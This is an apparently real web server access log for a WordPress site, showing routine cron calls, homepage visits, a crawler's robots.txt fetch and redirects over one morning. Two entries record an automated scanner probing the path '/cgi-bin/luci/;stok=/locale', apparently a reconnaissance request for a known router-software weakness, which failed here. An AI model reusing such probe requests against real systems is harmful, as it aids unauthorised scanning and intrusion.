204.76.203.212 - - [03/Dec/2025:07:21:05 +0800] "GET / HTTP/1.1" 200 33525 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Dec/2025:07:26:14 +0800] "POST /wp-cron.php?doing_wp_cron=1764717974.7357149124145507812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
185.16.39.146 - - [03/Dec/2025:07:26:15 +0800] "GET / HTTP/1.1" 200 152189 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [03/Dec/2025:07:47:20 +0800] "POST /wp-cron.php?doing_wp_cron=1764719240.7949099540710449218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.52 - - [03/Dec/2025:07:47:21 +0800] "GET / HTTP/1.1" 200 33525 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Dec/2025:07:48:28 +0800] "POST /wp-cron.php?doing_wp_cron=1764719308.5714280605316162109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [03/Dec/2025:07:48:28 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
193.142.147.209 - - [03/Dec/2025:07:48:29 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [03/Dec/2025:07:51:53 +0800] "POST /wp-cron.php?doing_wp_cron=1764719513.5590789318084716796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
110.249.201.115 - - [03/Dec/2025:07:51:53 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
36.133.115.36 - - [03/Dec/2025:07:58:58 +0800] "POST /wp-cron.php?doing_wp_cron=1764719938.0911560058593750000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
141.98.11.170 - - [03/Dec/2025:07:58:58 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
39.79.71.40 - - [03/Dec/2025:08:03:51 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 33988 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [03/Dec/2025:08:03:51 +0800] "POST /wp-cron.php?doing_wp_cron=1764720231.3183360099792480468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
183.162.114.249 - - [03/Dec/2025:08:03:51 +0800] "GET http://www.cqqizhou.com/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
